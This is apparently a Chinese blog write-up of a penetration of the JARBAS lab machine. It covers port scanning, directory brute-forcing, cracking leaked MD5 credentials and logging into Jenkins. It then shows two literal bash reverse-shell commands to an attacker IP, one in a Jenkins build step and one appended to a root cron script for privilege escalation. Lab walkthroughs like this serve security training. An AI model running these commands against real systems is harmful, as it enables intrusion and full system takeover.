红队靶机渗透-JARBAS

最新推荐文章于 2024-09-17 14:03:04 发布
最新推荐文章于 2024-09-17 14:03:04 发布
阅读量235 收藏 9
点赞数 5
分类专栏: 靶机渗透 文章标签: 网络安全 系统安全 web安全 安全威胁分析 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57967573/article/details/138319640
版权

1.信息收集

1.1 主机发现

nmap -sn 192.168.197.0/24
确定目标的IP地址为192.168.197.156

1.2 端口扫描

nmap --min-rate 10000 -p- 192.168.197.156
可以看到开放了4个端口 22,80,3306,8080

1.3 详细信息扫描

对开放端口进行TCP和UDP扫描

nmap -sT -sV -O -p22,80,3306,8080 192.168.197.156

 nmap -sU --top-ports 20 192.168.197.156

使用nmap 自带的漏洞脚本扫描

 nmap --script=vuln -p22,80,3306,8080 192.168.197.156

2.系统攻击面分析

访问 80 端口,看到如下web页面

未发现可利用功能点,尝试目录爆破,dirb http://192.168.197.156,只爆出一个index页面

换其它爆破试试

gobuster dir -u http://192.168.197.156 --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
SecLists是OWASP维护的一个安全信息列表集合。该集合包括了用于渗透的各种类型的列表。这些列表包含了237个字典文件以及常用的Web Shell攻击载荷。字典文件类型众多,包括用户名、密码、域名、敏感数据特征码、模糊测试载荷等。可以通过apt install seclists下载它。
同样没爆出什么页面

添加参数再次尝试:gobuster dir -u http://192.168.197.156 --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php
-x:指定扩展名

爆出 access.html 页面,尝试访问,发现三组用户名及 md5 值的组合

解密得:

tiago:italia99
trindade:marianna
eder:vipsu

访问 8080 端口是一个登录页面,用上面的eder 用户成功登录

可以看到它是一个 Jenkins 内容管理系统,Jenkins 是一个 开源软件项目,是基于 Java 开发的一种 持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。新建一个项目 (New Item),查看是否存在可利用的点,在 Build 项发现可以执行 shell (Execute shell)。

在这里写一条反弹 shell 命令,同时 kali 开启监听

/bin/bash -i >& /dev/tcp/192.168.197.132/4444 0>&1

3.提权

可以看到当前用户是 jenkins, sudo -l 提示没有任何权限;查看自动任务,cat /etc/crontab

系统每 5 分钟以 root 权限执行 CleaningScript.sh 脚本,查看脚本内容:cat /etc/script/CleaningScript.sh,是一条删除访问日志的命令

由于系统是以 root 权限运行这个脚本,我们可以在这个脚本当中写入命令来实现提权

echo "/bin/bash -i >& /dev/tcp/192.168.197.132/5555 0>&1" >> /etc/script/CleaningScript.sh

将 bash 命令追加到 CleaningScript.sh 文件中,同时 kali 开启监听,理论上 5 分钟内可以获得反弹 shell

成功拿到 root 权限,这台机器渗透测试完成!

4.总结

首先端口扫描发现了80和8080两个web端口,通过对两个web端口的浏览和目录爆破,发现它是一套Jenkins内容管理系统,8080端口是这个系统的登录界面;
我们并不知道登录用户名,密码,联想想到三种方式:1.暴力破解 2.网上寻找这套系统的默认密码  3.弱密码;
在对80端口的目录爆破中发现了access.html页面,存放有md5加密的3组用户名密码值,破解之后获得明文密码,在8080端口尝试登录,发现eder账号可以登录;
进入后台是Jenkins内容管理系统,利用方式相对固定,需要经验,没有经验可以去网上搜索公开的利用方式;
Jenkins新建一个项目的时候,在Build里可以执行shell命令,我们写入了反弹shell命令,获得了初始shell,但权限非常受限;
于是通过crontab自动任务查看到CleaningScript.sh脚本每5分钟以root权限执行一次,将bash命令追加到这个文件中,最终获得了root权限。
cyobg
关注
专栏目录
红队渗透-window痕迹清除
EdisonJH的博客
05-16 2389
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、windows操作系统基础入门二、windows渗透痕迹清除1.为避免入侵操作行为被发现时,攻击者往往通过各种方式来隐藏自己操作痕迹,比如:删除日志、隐藏后门、日志伪造。 前言 我们在做痕迹清理时,一定要对windows的基础理论,基础知识点明确于心,废话不多说,接下来开始学习。 记录MS08068学习红队三期windows痕迹清除 1、windows用户基础入门 2、windows用户命令入门 3、windows渗透痕.
vulnstack1--红队靶机(域渗透
tlovejr的博客
04-27 4105
一、前言 这几天一直有点任务,就一直没来得更新,现在继续给大家更新一些贴近真实情况的靶场环境,今天的文章或许会有点长,因为有好多和我一样的小白,所以在这就多墨迹几句,有什么不对的还请大佬们给予批评指正 二、靶场前准备 首先做靶场前先需要做一些准备 1、下载靶场镜像文件 这步就没什么过多介绍的 链接:https://pan.baidu.com/s/1lElVlUfEovffRWWOCktdVQ?pwd=6666 提取码:6666 2、修改各个靶机登录密码 因为第一次登录不修改密码的话,第二次开机时,原
红队靶机渗透-SickOS1.1
m0_57967573的博客
04-29 654
主机发现之后,分别用nmap的TCP和UDP扫描发现三个端口,8080存疑,未开放端口,3128是一个squid代理服务器,22 SSH端口 8080无法访问;3128提示报错信息,目录爆破也没有任何信息,由于它是代理服务器,因此以3128端口做代理进行目录扫描,得到了新的有价值web目录 通过在浏览器上把3128设置为代理服务器,访问到了靶机web页面,看到了wolfcms内容管理系统······
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 1804
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
红队渗透靶场之Jarbas靶场(超详细)
xf555er的博客
11-26 1397
Jarbas靶场演练, 红队渗透必学靶场
红队笔记-2:JARBAS打靶流程(vulnhub)
qq_63442530的博客
03-15 1063
1.主机发现和端口扫描:nmap扫描发现靶机是192.168.200.140,和存活端口22,80,3306,8080。2.80和8080端口:从web角度入手,80端口是web,8080端口是web的后台,对其web先进行目录扫描,发现普通扫扫描没有扫描发现,尝试添加参数扫描-X,扫描后发现access.html文档,通过破解access.html页面的密文获得账号密码,组合账号密码登录后台成功。
红队靶机jarbas靶机复现,反弹sehll提权,用定时任务来提升至root用户
m0_58116751的博客
05-15 1984
发现靶机IP为192.168.38.134 开放了22,3306,80,8080我们可以进行的远程连接 找他web服务的漏洞,数据库如果能搜寻到泄露的信息也可以进行渗透,80端口有限级较高我们先测试他的web服务,在看下他的8080端口有个登录页面。我们显示发现了他可植入的初始shell在渗透过程中发现了他的权限并不够那我们就要思维拓宽来看他的一些用户,进程,和启动项想办法移动到其它账号之中。我们用cat /etc/crontab来查看他的一个定时任务,他有一个5分钟执行一次的脚本我们来查看他。
红队打靶:vulnhub靶机之-------NullByte打靶思路
m0_55994898的博客
12-11 1188
查看靶机介绍,提示使用的是DHCP,自动分配的方式进行的好的,安装好后,开始打靶!!
红队打靶:JARBAS详细打靶思路(vulnhub)
Bossfrank的博客
06-03 1932
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
红队渗透打点工具-FindUpload
03-07
红队渗透打点工具-FindUpload】 在网络安全领域,红队渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
goby-红队专用版-for-Windows
12-15
goby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队...
AV_EDR 绕过红队村 PT-BR.pdf
10-06
在进行【网络安全渗透测试】时,红队(模拟攻击者)需要绕过这些防护机制,以评估系统的安全性。以下是一些可能的AV/EDR规避策略: 1. **编码或混淆**: 对恶意代码进行编码或混淆,使其在扫描时难以被识别。 2. **...
深信服红队检测服务-2页
05-07
深信服红队检测服务是指以 APT 攻击者视角对用户目前现有防御措施进行深度渗透测试,对目标系统、人员、软硬件设备、基础架构进行多维度、多手段、对抗性的模拟攻击。红队检测旨在发现可能被黑客利用的薄弱点,并以...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8460
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
/etc/sudoers文件中的哪些配置会影响系统安全
weixin_46483815的博客
09-16 464
文件时,务必谨慎行事,确保只有受信任的用户和组具有适当的权限,并限制他们可以执行的命令和主机。组的成员都具有执行任何命令的权限。确保只有受信任的用户和组具有这些权限。命令限制:限制用户可以执行的命令。如果配置不当,可能导致未经授权的用户获得管理员权限。不需要的配置行:删除或注释掉不再需要的配置行,以减少潜在的安全风险。允许用户在不受信任的主机上执行特权命令可能导致安全风险。限制用户可以执行的命令可以降低潜在的安全风险。命令在非交互式终端上执行,从而降低潜在的安全风险。之外的所有主机上执行特权命令。
linux-安全管理-文件系统安全
最新发布
Flying_Fish_roe的博客
09-17 1031
文件系统安全是 Linux 安全管理的核心部分,它涵盖了权限管理、加密、强制访问控制和系统审计等多个方面。通过合理设置文件权限、使用加密技术、启用审计机制和监控文件活动,可以有效提升系统的安全性,防止未经授权的访问和操作。
计算机信息系统安全保护等级
ronshi的博客
09-14 391
计算机信息系统安全保护等级
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2741
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
红队渗透测试lampiao
09-14
lampiao是一个用于红队渗透测试的虚拟机靶机。根据引用提供的信息,你可以通过以下步骤来进行该渗透测试: 1. 下载lampiao虚拟机:你可以从"https://download.vulnhub.com/lampiao/Lampiao.zip"下载lampiao虚拟机。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值